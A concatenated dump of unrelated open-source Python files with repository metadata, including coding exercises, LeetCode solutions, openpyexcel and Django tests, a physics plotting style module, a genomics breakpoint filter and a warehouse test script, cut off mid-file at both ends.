self.holidayDates.append(datetime.datetime(holidayDate[0], holidayDate[1], holidayDate[2], holidayDate[3], holidayDate[4], holidayDate[5]))
| [
"[email protected]"
] | |
0f20585a844977b4362a9860a036f47b28823b97 | ecf1ce6f8b592f76c7b7c253608c1264ae0676a3 | /days/day017/list_comprehensions_and_generators.py | 78d9123b75c5cf83388f77dff5985392cf955d59 | [] | permissive | alex-vegan/100daysofcode-with-python-course | 94e99880a50ac412e398ad209ed53796f253641f | b6c12316abe18274b7963371b8f0ed2fd549ef07 | refs/heads/master | 2021-07-20T23:05:59.721661 | 2019-01-21T16:18:25 | 2019-01-21T16:18:25 | 150,115,516 | 0 | 0 | MIT | 2018-09-24T14:28:16 | 2018-09-24T14:28:15 | null | UTF-8 | Python | false | false | 1,006 | py | from random import sample
from itertools import islice
from pprint import pprint as pp
NAMES = ['arnold schwarzenegger', 'alec baldwin', 'bob belderbos',
'julian sequeira', 'sandra bullock', 'keanu reeves',
'julbob pybites', 'bob belderbos', 'julian sequeira',
'al pacino', 'brad pitt', 'matt damon', 'brad pitt']
def convert_title_case_names(names=NAMES):
return [name.title() for name in names]
def reverse_first_last_names(names=NAMES):
return [" ".join(name.split()[::-1]) for name in names]
def gen_pairs(names=NAMES):
while True:
l, r = sample(names, 2)
yield f"{(l.split()[0]).title()} teams up with {(r.split()[0]).title()}"
'''
if __name__ == "__main__":
print(convert_title_case_names())
print('-'*101)
print(reverse_first_last_names())
print('-'*101)
pairs = gen_pairs()
for _ in range(10):
print(next(pairs))
print('-'*101)
pp(list(islice(pairs, 10)))
'''
| [
"[email protected]"
] | |
83ef4a6d7e5cdbfb45c05ea36208a409740e1e33 | 2280e309df300fe1d4cd684799b9aeeb3495c6cc | /core/inbound.py | c6ecbcc422d08468584f3ea64b30969da4f41629 | [] | no_license | cming091/psshutlle-toots | 471fe1a9505116b6d9571259e9de04b3d7404f98 | 1445c2efd024fe33743c09bac799ed9f4a3f15cb | refs/heads/master | 2023-05-30T12:34:39.364337 | 2021-06-21T07:23:23 | 2021-06-21T07:23:23 | 378,834,840 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,856 | py | import time
import os
from .base import Base
from config import CONF
from utils import *
from psgrpc import wholeInboundBcr
logger = LogHandler(__name__)
class Inbound(Base):
def __init__(self, data):
super(Inbound,self).__init__(data)
def singleProcess(self):
self.common.tearDownStockAndAssignTables(self.db,self.data, defaultdbs=['wes'])
if self.data['isSimulate']:
status = self.registerFrame()
if not status:
self.statusCode = 402
raise Exception('[{} registerFrame error]'.format(self.data['sName']))
else:
logger.info('[{} registerFrame succ]'.format(self.data['sName']))
time.sleep(CONF['delay'])
if self.addWorkOrder():
logger.info('[{} addWorkOrder succ]'.format(self.data['sName']))
time.sleep(CONF['delay'])
if self.creatAggs():
logger.info('[{} creatAggs succ]'.format(self.data['sName']))
time.sleep(CONF['delay'])
self.triggerBcr()
self.checkAggOpStatus()
self.checkBound()
else:
self.statusCode = 404
else:
self.statusCode = 403
return self.data['containerCode']
def registerFrame(self):
self.sqlRmStartNodePods()
data = {
"warehouseID": self.data['warehouseID'],
"frameID": self.data['frameID'],
"nodeID": self.data['nodeID'],
"dir": 1
}
url = '{}/tes/api/frame/registerFrame'.format(CONF['baseUrl'])
res = RequestApi.sendReuest('registerFrame', 'POST', url, data).json()
logger.info('[{} registerFrame: res:{}]'.format(self.data['sName'],res))
if res.get(self.data['returnCode'], None) == 0:
return True
return False
def init(self):
logger.info('[{} init ]'.format(self.data['sName']))
self.sqlRmAllPods()
def triggerBcr(self):
info = wholeInboundBcr(self.data['ip'],self.data['warehouseCode'],self.data['containerCode'],self.data['warehouseID'])
logger.info('[{} bcr res:{}]'.format(self.data['sName'],info))
def addWorkOrder(self):
url = '{}/invtransaction/api/workorder/inbound/add'.format(CONF['baseUrl'])
data ={
"woNo": self.data['no'],
"warehouseCode": self.data['warehouseCode'],
"regionCode": self.data['regionCode'],
"waveNo": self.data['no'],
"inBoundNo": self.data['no'],
"originStation": "PS-IN-001",
"priority": 0,
"transportUnit": self.data['containerCode'],
"containerCode": self.data['containerCode'],
"skuCode": self.data['skuCode'],
"skuName": self.data['skuName'],
"lot": "",
"grade": 0,
"quantity": self.data['quantity'],
"boxQuantity": 1,
"bizType": 1,
"transType": self.data['transType'],
"bizDate": 1594292882000,
"destination": "309843433806102535",
"rely_wo_no": "",
"extension": "",
"user": "user",
'palletModel':0,
}
res = RequestApi.sendReuest('addWorkOrder', 'POST', url, data, headers=self.headers).json()
logger.info('[{} addWorkOrder: res:{}]'.format(self.data['sName'],res))
if res.get(self.data['returnCode'],None) == 0:
return True
return False
def sqlRmStartNodePods(self):
sql = 'delete from tes.frame where status=1 and node=\'{}\';'.format(self.data['startNodeId'])
self.db.get_connection('tes')
res = self.db.execute('tes', sql)
logger.info('[{} sqlRmStartNodePods tes res:{}]'.format(self.data['sName'],res))
| [
"[email protected]"
] | |
dcc7adaa49fada352d2eb346c9e51df6ed8c9dd4 | 0a5c468cee07b79ddb5368aa7b0fe118f4b11e72 | /lazy_slides/download.py | 72beca49e25d6ab0de60cb57f0674c4ab1b133c7 | [] | no_license | abingham/lazy_slides | c36e451571c14e53cbc2817d4f72475fa5c400ba | ca8eb4618415df6eaa9fb3c3f721cb168708f52b | refs/heads/master | 2020-05-19T16:34:20.286129 | 2013-06-18T17:58:05 | 2013-06-18T17:58:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | import contextlib
import logging
import os
import urllib2
import urlparse
import uuid
log = logging.getLogger(__name__)
def download(url, directory):
'''Download a file specified by a URL to a local file.
This generates a unique name for the downloaded file and saves
into that.
:param url: The URL to download.
:param directory: The directory into which to save the file.
'''
parsed = urlparse.urlparse(url)
# Calculate the save-file name
filename = os.path.split(parsed.path)[1]
filename_comps = os.path.splitext(filename)
filename = '{}_{}{}'.format(
filename_comps[0],
uuid.uuid4(),
filename_comps[1])
filename = os.path.join(directory, filename)
log.info('Downloading {} to {}'.format(
url, filename))
# Save the URL data to the new filename.
with contextlib.closing(urllib2.urlopen(url)) as infile:
with open(filename, 'wb') as outfile:
outfile.write(infile.read())
return filename
| [
"[email protected]"
] | |
80cd8baa4841a770e7eb7696c77d6f7a99d12ad2 | 23130cd12e38dbce8db8102810edaad70b240ae2 | /lintcode/235.py | e2c5a50114f99694f5bfed245e493ea6148b0de9 | [
"MIT"
] | permissive | kangli-bionic/algorithm | ee6687c82101088db20f10fb958b4e45e97d3d31 | c3c38723b9c5f1cc745550d89e228f92fd4abfb2 | refs/heads/master | 2023-01-05T09:29:33.204253 | 2020-10-25T17:29:38 | 2020-10-25T17:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | """
235. Prime Factorization
https://www.lintcode.com/problem/prime-factorization/
"""
import math
class Solution:
"""
@param num: An integer
@return: an integer array
"""
def primeFactorization(self, num):
result = []
up = math.sqrt(num)
k = 2
while k <= up and num > 1:
while num % k == 0:
result.append(k)
num //= k
k += 1
if num > 1:
result.append(num)
return result
| [
"[email protected]"
] | |
8879d084898863cce23dedb47389a370ebb7adcf | 11a1e1140fe869e83e337518ca99162cca8780dd | /BHScripts_8TeV_postICHEP_Final_WithRun2012C_NewFitRange/histograms/DataAnalysis_FitRanges/Styles.py | ec5775c7f79b34278912b0d67309b9cfba720b4c | [] | no_license | jhakala/BHMacros | 6bdd1ac855df8a803f39f06e7e218b24b2eb76b1 | bc3cf2e3c1d3570a9e042c865214035e60d20021 | refs/heads/master | 2021-01-19T04:52:27.624800 | 2015-04-09T12:14:21 | 2015-04-09T12:14:21 | 33,666,386 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,718 | py | pattle = [862, 814, 797, 899, 614, 921]
marker = [20, 21, 22, 25, 24, 26]
from ROOT import gStyle
from ROOT import gROOT
from ROOT import TStyle
gStyle.SetPadTopMargin(0.05)
gStyle.SetPadRightMargin(0.05)
def formatST(h):
h.SetMarkerStyle(20)
h.SetMarkerColor(923)
h.SetLineColor(923)
h.SetXTitle("S_{T} (GeV)")
h.SetYTitle("Events / %d GeV" % h.GetBinWidth(1))
h.GetYaxis().SetTitleOffset(1.2)
def formatTemplate(f, N, iformula):
f.SetLineWidth(2)
f.SetLineColor(pattle[iformula])
if N == 2:
f.SetLineStyle(1)
elif N == 3:
f.SetLineStyle(2)
def formatUncertainty(g):
g.SetLineWidth(2)
g.SetFillColor(862)
#g.SetLineColor(33)
g.SetLineColor(862)
g.SetFillColor(33)
#g.SetFillStyle()
g.GetXaxis().SetTitle("S_{T} (GeV)")
g.GetYaxis().SetTitle("Events / 100 GeV")
g.GetYaxis().SetTitleOffset(1.2)
def formatCL(g, type, width=4):
g.SetLineWidth(width)
g.GetXaxis().SetTitle("S_{T}^{ min} (GeV)")
g.GetXaxis().SetNdivisions(5,5,0)
g.GetYaxis().SetTitle("#sigma(S_{T} > S_{T}^{ min}) #times A (pb)")
g.GetYaxis().SetTitleOffset(1.2)
if type == "CL95":
g.SetLineColor(862)
g.SetFillColor(862)
elif type == "CLA":
g.SetLineColor(899)
g.SetFillColor(899)
g.SetLineStyle(2)
def formatXsecCL(g, icolor, line_style=1):
g.SetLineWidth(2)
g.SetLineColor(pattle[icolor])
g.SetLineStyle(line_style)
g.SetMarkerColor(pattle[icolor])
g.SetMarkerSize(1)
g.GetXaxis().SetTitle("M_{BH}^{ min} (TeV)")
g.GetYaxis().SetTitle("#sigma (pb)")
g.GetYaxis().SetTitleOffset(1.2)
def formatExcludedMass(g, name = ""):
g.GetXaxis().SetTitle("M_{D} (TeV)")
g.GetYaxis().SetTitle("Excluded M_{BH}^{ min} (TeV)")
g.GetYaxis().SetTitleOffset(1.2)
if not name == "":
g.SetLineWidth(3)
g.SetMarkerSize(1)
if "BH1_BM" in name or "BH4_CH" in name:
color = 922
marker_style = 20
line_style = 1
if "BH2_BM" in name or "BH2_CH" in name:
color = 862
marker_style = 21
line_style = 2
if "BH8_CH" in name:
color = 899
marker_style = 22
line_style = 3
if "BH6_CH" in name or "BH5_BM" in name:
color = 797
marker_style = 20
line_style = 1
if "BH10_CH" in name:
color = 2
marker_style = 23
line_style = 2
if "BH9_CH" in name:
color = 4
marker_style = 24
line_style = 3
g.SetLineColor(color)
g.SetLineStyle(line_style)
g.SetMarkerStyle(marker_style)
g.SetMarkerSize(1)
g.SetMarkerColor(color)
def formatRatio(h, icolor):
h.SetMarkerColor(pattle[icolor])
#h.SetMarkerStyle(marker[icolor])
h.SetLineColor(pattle[icolor])
| [
"[email protected]"
] | |
f3a5e46acb64711021bf454c7e8f5af682764ebf | 48f10cc3520ba8cfa5f3478e4b021766e4d5f29b | /openpyexcel/drawing/tests/test_text.py | 82b747c27e487d5e6e9267a416b1ef8698b4401b | [
"MIT"
] | permissive | sciris/openpyexcel | bef5094d193e62806164c77777fe8c741511aaec | 1fde667a1adc2f4988279fd73a2ac2660706b5ce | refs/heads/master | 2022-01-20T14:04:52.196385 | 2019-02-06T22:48:38 | 2019-02-06T22:48:38 | 168,293,752 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,372 | py | from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyexcel
import pytest
from openpyexcel.xml.functions import fromstring, tostring
from openpyexcel.tests.helper import compare_xml
@pytest.fixture
def Paragraph():
from ..text import Paragraph
return Paragraph
class TestParagraph:
def test_ctor(self, Paragraph):
text = Paragraph()
xml = tostring(text.to_tree())
expected = """
<p xmlns="http://schemas.openxmlformats.org/drawingml/2006/main">
<r>
<t/>
</r>
</p>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Paragraph):
src = """
<p />
"""
node = fromstring(src)
text = Paragraph.from_tree(node)
assert text == Paragraph()
def test_multiline(self, Paragraph):
src = """
<p>
<r>
<t>Adjusted Absorbance vs.</t>
</r>
<r>
<t> Concentration</t>
</r>
</p>
"""
node = fromstring(src)
para = Paragraph.from_tree(node)
assert len(para.text) == 2
@pytest.fixture
def ParagraphProperties():
from ..text import ParagraphProperties
return ParagraphProperties
class TestParagraphProperties:
def test_ctor(self, ParagraphProperties):
text = ParagraphProperties()
xml = tostring(text.to_tree())
expected = """
<pPr xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, ParagraphProperties):
src = """
<pPr />
"""
node = fromstring(src)
text = ParagraphProperties.from_tree(node)
assert text == ParagraphProperties()
from ..spreadsheet_drawing import SpreadsheetDrawing
class TestTextBox:
def test_from_xml(self, datadir):
datadir.chdir()
with open("text_box_drawing.xml") as src:
xml = src.read()
node = fromstring(xml)
drawing = SpreadsheetDrawing.from_tree(node)
anchor = drawing.twoCellAnchor[0]
box = anchor.sp
meta = box.nvSpPr
graphic = box.graphicalProperties
text = box.txBody
assert len(text.p) == 2
@pytest.fixture
def CharacterProperties():
from ..text import CharacterProperties
return CharacterProperties
class TestCharacterProperties:
def test_ctor(self, CharacterProperties):
from ..text import Font
normal_font = Font(typeface='Arial')
text = CharacterProperties(latin=normal_font, sz=900, b=False, solidFill='FFC000')
xml = tostring(text.to_tree())
expected = ("""
<a:defRPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
b="0" sz="900">
<a:solidFill>
<a:srgbClr val="FFC000"/>
</a:solidFill>
<a:latin typeface="Arial"/>
</a:defRPr>
""")
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, CharacterProperties):
src = """
<defRPr sz="110"/>
"""
node = fromstring(src)
text = CharacterProperties.from_tree(node)
assert text == CharacterProperties(sz=110)
@pytest.fixture
def Font():
from ..text import Font
return Font
class TestFont:
def test_ctor(self, Font):
fut = Font("Arial")
xml = tostring(fut.to_tree())
expected = """
<latin typeface="Arial"
xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Font):
src = """
<latin typeface="Arial" pitchFamily="40"
xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
"""
node = fromstring(src)
fut = Font.from_tree(node)
assert fut == Font(typeface="Arial", pitchFamily=40)
@pytest.fixture
def Hyperlink():
from ..text import Hyperlink
return Hyperlink
class TestHyperlink:
def test_ctor(self, Hyperlink):
link = Hyperlink()
xml = tostring(link.to_tree())
expected = """
<hlinkClick xmlns="http://schemas.openxmlformats.org/drawingml/2006/main"/>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Hyperlink):
src = """
<hlinkClick tooltip="Select/de-select all"/>
"""
node = fromstring(src)
link = Hyperlink.from_tree(node)
assert link == Hyperlink(tooltip="Select/de-select all")
@pytest.fixture
def LineBreak():
from ..text import LineBreak
return LineBreak
class TestLineBreak:
def test_ctor(self, LineBreak):
fut = LineBreak()
xml = tostring(fut.to_tree())
expected = """ <br xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" /> """
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, LineBreak):
src = """
<br />
"""
node = fromstring(src)
fut = LineBreak.from_tree(node)
assert fut == LineBreak()
| [
"[email protected]"
] | |
41e9e39d9234f668e5bdebd3c69be5fac6a52ed8 | bc074a145c83c53c24288a62806e9806f4bf992f | /lib/bp_utils/filt.py | 8ef6443344a1f4016b9beb9ad690d9e0634a3618 | [] | no_license | Genomon-Project/GenomonBreakPoint | 4b9f44751894d67d8e19a0170f162ab15ce6b237 | 0eed3922c483edcc8a181af042fcce86ad9d9203 | refs/heads/master | 2021-06-09T06:36:31.676564 | 2016-11-20T13:26:36 | 2016-11-20T13:26:36 | 73,768,508 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,154 | py | #! /usr/bin/env python
import sys, gzip, math, numpy
import pysam
from scipy import stats
def filter_by_control(tumor_bp_file, output_file, matched_control_bp_file, merged_control_file,
min_support_num, min_median_mapq, min_max_clip_size, max_control_num_thres):
use_matched_control = True if matched_control_bp_file != "" else False
if use_matched_control: matched_control_db = pysam.TabixFile(matched_control_bp_file)
use_merged_control = True if merged_control_file != "" else False
if use_merged_control: merged_control_db = pysam.TabixFile(merged_control_file)
hout = open(output_file, 'w')
with gzip.open(tumor_bp_file, 'r') as hin:
for line in hin:
F = line.rstrip('\n').split('\t')
mapqs = [int(x) for x in F[5].split(';')]
clip_sizes = [int(x) for x in F[6].split(';')]
if len(mapqs) < min_support_num: continue
if numpy.median(mapqs) < min_median_mapq: continue
if max(clip_sizes) < min_max_clip_size: continue
# filtering using merged control file
merged_control_filt_flag = False
if use_merged_control:
tabixErrorFlag = 0
try:
records = merged_control_db.fetch(F[0], int(F[1]) - 1, int(F[1]) + 1)
except Exception as inst:
print >> sys.stderr, "%s: %s" % (type(inst), inst.args)
tabixErrorMsg = str(inst.args)
tabixErrorFlag = 1
if tabixErrorFlag == 0:
for record_line in records:
record = record_line.split('\t')
if record[0] == F[0] and record[1] == F[1] and record[2] == F[2] and record[3] == F[3]:
merged_control_filt_flag = True
if merged_control_filt_flag: continue
# get readnum from matched control file
if use_matched_control:
num_matched_control = 0
tabixErrorFlag = 0
try:
records = matched_control_db.fetch(F[0], int(F[1]) - 1, int(F[1]) + 1)
except Exception as inst:
print >> sys.stderr, "%s: %s" % (type(inst), inst.args)
tabixErrorMsg = str(inst.args)
tabixErrorFlag = 1
if tabixErrorFlag == 0:
for record_line in records:
record = record_line.split('\t')
if record[0] == F[0] and record[1] == F[1] and record[2] == F[2] and record[3] == F[3]:
num_matched_control = len(record[5].split(';'))
else:
num_matched_control = "---"
if use_matched_control and num_matched_control > max_control_num_thres: continue
print >> hout, '\t'.join(F[:4]) + '\t' + str(len(mapqs)) + '\t' + str(num_matched_control)
hout.close()
def filter_by_allele_freq(input_file, output_file, tumor_bam, matched_control_bam, tumor_AF_thres, control_AF_thres, max_fisher_pvalue):
hout = open(output_file, 'w')
print >> hout, '\t'.join(["Chr", "Pos", "Dir", "Junc_Seq",
"Num_Tumor_Total_Read", "Num_Tumor_Var_Read", "Num_Control_Total_Read", "Num_Control_Var_Read",
"Minus_Log_Fisher_P_value"])
with open(input_file, 'r') as hin:
for line in hin:
F = line.rstrip('\n').split('\t')
tumor_num = int(F[4])
control_num = int(F[5])
region = F[0] + ':' + F[1] + '-' + F[1]
depth_tumor_info = pysam.depth(tumor_bam, "-r", region)
depth_tumor = int(depth_tumor_info.rstrip('\n').split('\t')[2])
AF_tumor = float(tumor_num) / depth_tumor
if AF_tumor < tumor_AF_thres: continue
# print '\t'.join(F)
if matched_control_bam != "":
depth_control_info = pysam.depth(matched_control_bam, "-r", region)
depth_control = int(depth_control_info.rstrip('\n').split('\t')[2]) if depth_control_info != "" else 0
control_AF = float(control_num) / depth_control if depth_control > 0 else 1.0
else:
depth_control = "---"
control_AF = "---"
if control_AF != "---" and control_AF > control_AF_thres: continue
lpvalue = "---"
if control_AF != "":
oddsratio, pvalue = stats.fisher_exact([[depth_tumor - tumor_num, tumor_num], [depth_control - control_num, control_num]], 'less')
if pvalue < 1e-100: pvalue = 1e-100
lpvalue = (- math.log(pvalue, 10) if pvalue < 1 else 0)
lpvalue = round(lpvalue, 4)
if 10**(-lpvalue) > float(max_fisher_pvalue): continue
print >> hout, '\t'.join(F[:4]) + '\t' + str(depth_tumor) + '\t' + str(tumor_num) + '\t' + \
str(depth_control) + '\t' + str(control_num) + '\t' + str(lpvalue)
hout.close()
| [
"[email protected]"
] | |
38e297f2ecdcdafc8a850489ec195d720ca6a99a | fff5eeff850258b5208f41d4f6c3027044f5374a | /blog/tests/test_urls.py | e384ffffc42e1bbf5c436fcd0981a200d3649038 | [] | no_license | khabdrick/django-pytest | 3f4300f875ed4c6ad9d4fa1bb3bf0902c3e420e7 | 5ce5f5cd1973885dfa2d476b1817d00644e9b10c | refs/heads/main | 2023-04-01T17:10:22.220605 | 2021-04-20T17:27:43 | 2021-04-20T17:27:43 | 345,196,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | from django.urls import reverse, resolve
class TestUrls:
def test_post_content_url(self):
path = reverse("content", kwargs={'pk':1})
assert resolve(path).view_name == "content" | [
"[email protected]"
] | |
ec2f321127e4a1f870d4e4c9b178002ea220402a | d74ccf6290b7acb0011fd9b9132cd8beac0bd9d3 | /back/movies/migrations/0003_movie_like_users.py | 13f3f2abdab2d74e4da72d3a07d59fe254a85fc1 | [] | no_license | gaberani/final_netflix | a0687c9cec9157712c9fe2a8627d3624e5fe00b6 | 637016fd6a0c589f1ff96ed5e9225deffc8f18cb | refs/heads/master | 2022-11-09T10:42:22.460795 | 2020-06-21T00:30:21 | 2020-06-21T00:30:21 | 272,981,572 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | # Generated by Django 2.1.15 on 2020-06-15 11:38
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('movies', '0002_comment'),
]
operations = [
migrations.AddField(
model_name='movie',
name='like_users',
field=models.ManyToManyField(related_name='like_movies', to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
] | |
517d75eb080fc570f9f2944db0205779a06920c9 | 6ac0bba8c1851e71529269c0d9d89a7c8fa507f2 | /Medium/18.py | 5808c521f0c1350c3c957493c5fcc72c735dcfcf | [] | no_license | Hellofafar/Leetcode | e81dc85689cd6f9e6e9756beba070cb11e7b192e | 7a459e9742958e63be8886874904e5ab2489411a | refs/heads/master | 2021-05-16T07:07:19.823953 | 2020-02-17T03:00:09 | 2020-02-17T03:00:09 | 103,690,780 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | # ------------------------------
# 18. 4Sum
#
# Description:
# Given an array S of n integers, are there elements a, b, c, and d in S such that a + b + c + d = target? Find all unique quadruplets in the array which gives the sum of target.
#
# Note: The solution set must not contain duplicate quadruplets.
#
# Note: The solution set must not contain duplicate triplets.
# For example, given array S = [-1, 0, 1, 2, -1, -4],
# A solution set is:
# [
# [-1, 0, 1],
# [-1, -1, 2]
# ]
#
# Version: 1.0
# 10/17/17 by Jianfa
# ------------------------------
class Solution(object):
def fourSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[List[int]]
"""
res = []
nums.sort()
for i in range(len(nums) - 3):
if i > 0 and nums[i] == nums[i-1]:
continue # Think over here! At first I wrote i += 1, it's wrong.
possible_rest_three = self.threeSum(nums[i+1:], target - nums[i])
if possible_rest_three:
for three_set in possible_rest_three:
three_set.insert(0, nums[i])
res.append(three_set)
return res
def threeSum(self, nums, target):
res = []
nums.sort()
for i in range(0, len(nums) - 2):
if i > 0 and nums[i] == nums[i-1]:
continue
l, r = i+1, len(nums) - 1
while l < r:
s = nums[i] + nums[l] + nums[r]
if s > target:
r -= 1
elif s < target:
l += 1
else:
res.append([nums[i], nums[l], nums[r]])
while l < r and nums[l] == nums[l+1]:
l += 1
while l < r and nums[r] == nums[r-1]:
r -= 1
l += 1
r -= 1
return res
# Used for test
if __name__ == "__main__":
test = Solution()
nums = [1,0,-1,0,-2,2]
target = 0
print(test.fourSum(nums, target))
# Summary
# Leverage the idea of 3Sum. Check integer one by one and check 3Sum for the rest. | [
"[email protected]"
] | |
68616c0dbcebfbf9c42b5566168c88f7aa8c9404 | 7c2e677d931a8eb7d7cffc6d54713411abbe83e4 | /AppBuilder9000/AppBuilder9000/NflApp/migrations/0001_initial.py | c6c706f8bd214fbbea2270eca679fe35fce7be36 | [] | no_license | r3bunker/Python_Live_Project | 19e367b3cf74c2279c287fcd3a8a44a27f24041a | d3e06150d7daea6326cc1a4155309d99e4ff6244 | refs/heads/main | 2023-06-12T23:01:50.440371 | 2021-06-16T20:21:03 | 2021-06-16T20:21:03 | 344,883,966 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | # Generated by Django 2.2.5 on 2020-11-06 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='PlayerProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(choices=[('TE', 'TE'), ('QB', 'QB'), ('OL', 'OL'), ('DB', 'DB'), ('LB', 'LB'), ('WR', 'WR'), ('DL', 'DL'), ('RB', 'RB')], max_length=2)),
('name', models.CharField(default='', max_length=60)),
('height', models.PositiveIntegerField(max_length=3)),
('weight', models.PositiveIntegerField(max_length=3)),
('team', models.CharField(default='', max_length=30)),
],
),
]
| [
"[email protected]"
] | |
76e31ee753accb6937d8800000f3bbc5a28dabe6 | 8a9f0a0924706ded24ab4214aa42ab07f201e38b | /LeetCode_Python/Linked_List/Swap_Nodes_In_Pairs.py | 030136ef60b1879da3ce6eb6cdd836e2dfdd49ae | [] | no_license | gitzx/Data-Structure-Algorithm | 687162565729b12551cb660aa55a94f1d382014c | d6af7dfdc4d3d139fd939687a45dd36e327c914c | refs/heads/master | 2021-06-03T21:27:17.750464 | 2019-06-27T10:50:48 | 2019-06-27T10:50:48 | 14,443,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | '''
Given a linked list, swap every two adjacent nodes and return its head.
For example,
Given 1->2->3->4, you should return the list as 2->1->4->3.
Your algorithm should use only constant space. You may not modify the values in the list, only nodes itself can be changed.
'''
'''
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
'''
class Solution(object):
def swapPairs(self, head):
if head == None or head.next == None:
return head
dummy = ListNode(0)
dummy.next = head
p = dummy
while p.next and p.next.next:
tmp = p.next.next
p.next.next = tmp.next
tmp.next = p.next
p.next = tmp
p = p.next.next
return dummy.next
| [
"[email protected]"
] | |
b8760e44c9b37c312a00f01f06b0f1d1992247d0 | 28b405b8a538187367e019e45dd7fff3c5f4f296 | /src/rocks-pylib/rocks/commands/set/host/interface/vlan/__init__.py | 6224fb0a1b94d913a4014f8e6961bc95b0bc6627 | [] | no_license | rocksclusters/core | 95c84cbe4d9f998eea123177e43b25fa0475c823 | 7fb7208aa4a532e64db83e04759d941be9b96d91 | refs/heads/master | 2023-04-08T16:30:45.931720 | 2023-03-23T17:18:54 | 2023-03-23T17:18:54 | 58,084,820 | 21 | 11 | null | 2019-08-22T21:17:23 | 2016-05-04T21:21:17 | Python | UTF-8 | Python | false | false | 5,142 | py | # $Id: __init__.py,v 1.10 2012/11/27 00:48:28 phil Exp $
#
# @Copyright@
#
# Rocks(r)
# www.rocksclusters.org
# version 6.2 (SideWinder)
# version 7.0 (Manzanita)
#
# Copyright (c) 2000 - 2017 The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice unmodified and in its entirety, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. All advertising and press materials, printed or electronic, mentioning
# features or use of this software must display the following acknowledgement:
#
# "This product includes software developed by the Rocks(r)
# Cluster Group at the San Diego Supercomputer Center at the
# University of California, San Diego and its contributors."
#
# 4. Except as permitted for the purposes of acknowledgment in paragraph 3,
# neither the name or logo of this software nor the names of its
# authors may be used to endorse or promote products derived from this
# software without specific prior written permission. The name of the
# software includes the following terms, and any derivatives thereof:
# "Rocks", "Rocks Clusters", and "Avalanche Installer". For licensing of
# the associated name, interested parties should contact Technology
# Transfer & Intellectual Property Services, University of California,
# San Diego, 9500 Gilman Drive, Mail Code 0910, La Jolla, CA 92093-0910,
# Ph: (858) 534-5815, FAX: (858) 534-7345, E-MAIL:[email protected]
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# @Copyright@
#
# $Log: __init__.py,v $
# Revision 1.10 2012/11/27 00:48:28 phil
# Copyright Storm for Emerald Boa
#
# Revision 1.9 2012/08/23 16:42:07 clem
# set host interface vlan and set host interface subnet did not accept properly
# MAC addresses for their iface input argument
#
# Revision 1.8 2012/05/06 05:48:35 phil
# Copyright Storm for Mamba
#
# Revision 1.7 2011/07/23 02:30:38 phil
# Viper Copyright
#
# Revision 1.6 2010/09/07 23:53:01 bruno
# star power for gb
#
# Revision 1.5 2009/07/28 17:52:20 bruno
# be consistent -- all references to 'vlanid' should be 'vlan'
#
# Revision 1.4 2009/05/01 19:07:03 mjk
# chimi con queso
#
# Revision 1.3 2009/01/08 01:20:57 bruno
# for anoop
#
# Revision 1.2 2008/10/18 00:55:57 mjk
# copyright 5.1
#
# Revision 1.1 2008/07/22 00:34:41 bruno
# first whack at vlan support
#
#
#
import rocks.commands
class Command(rocks.commands.set.host.command):
"""
Sets the VLAN ID for an interface on one of more hosts.
